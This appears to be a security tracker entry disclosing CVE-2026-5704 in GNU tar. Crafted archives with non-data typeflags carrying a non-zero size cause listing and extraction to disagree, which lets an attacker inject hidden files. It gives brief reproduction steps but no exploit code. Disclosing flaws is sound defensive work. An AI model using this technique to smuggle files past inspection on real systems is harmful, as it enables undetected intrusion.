Bug 2455360 (CVE-2026-5704)

Summary: CVE-2026-5704 tar: tar: Hidden file injection via crafted archives
Product: [Other] Security Response Reporter: OSIDB Bzimport <bzimport>
Component: vulnerabilityAssignee: Product Security DevOps Team <prodsec-dev>
Status: NEW --- QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedKeywords: Security
Target Milestone: ---   
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: ---
Doc Text:
A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.
 Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description OSIDB Bzimport 2026-04-06 13:38:08 UTC 
Summary:
GNU tar allows malformed archives where non-data-bearing typeflags (symlink, char device, block device, FIFO) contain a non-zero size field, leading to inconsistent behavior between listing (tar -t) and extraction (tar -x). This results in stream desynchronization and enables hidden file injection.   
Requirements to exploit: 
An attacker only needs the ability to supply a crafted tar archive to a target system that performs pre-extraction inspection using tar -t (or equivalent API) and later extracts it using GNU tar. No privileges or user interaction beyond extraction are required.

Patch Available:
no

Version Fixed:
N/A

Impact:
Hidden file injection with fully attacker-controlled content

Bypass of pre-extraction inspection mechanisms

Single-implementation inconsistency (no cross-tool pipeline required)

 Attack complexity: Low (crafted archive is < 3 KB, no special privileges)

 Affected typeflags: '2', '3', '4', '6' (4 of 5 non-data typeflags)

Steps to reproduce if available: 

Generate a crafted archive with a non-data-bearing typeflag (e.g., chardev) and non-zero size. 

List contents

tar -tf crafted.tar 

→ injected file is NOT shown 

Extract archive: 

tar -xf crafted.tar 

Observe additional file created on disk that was not present in listing output.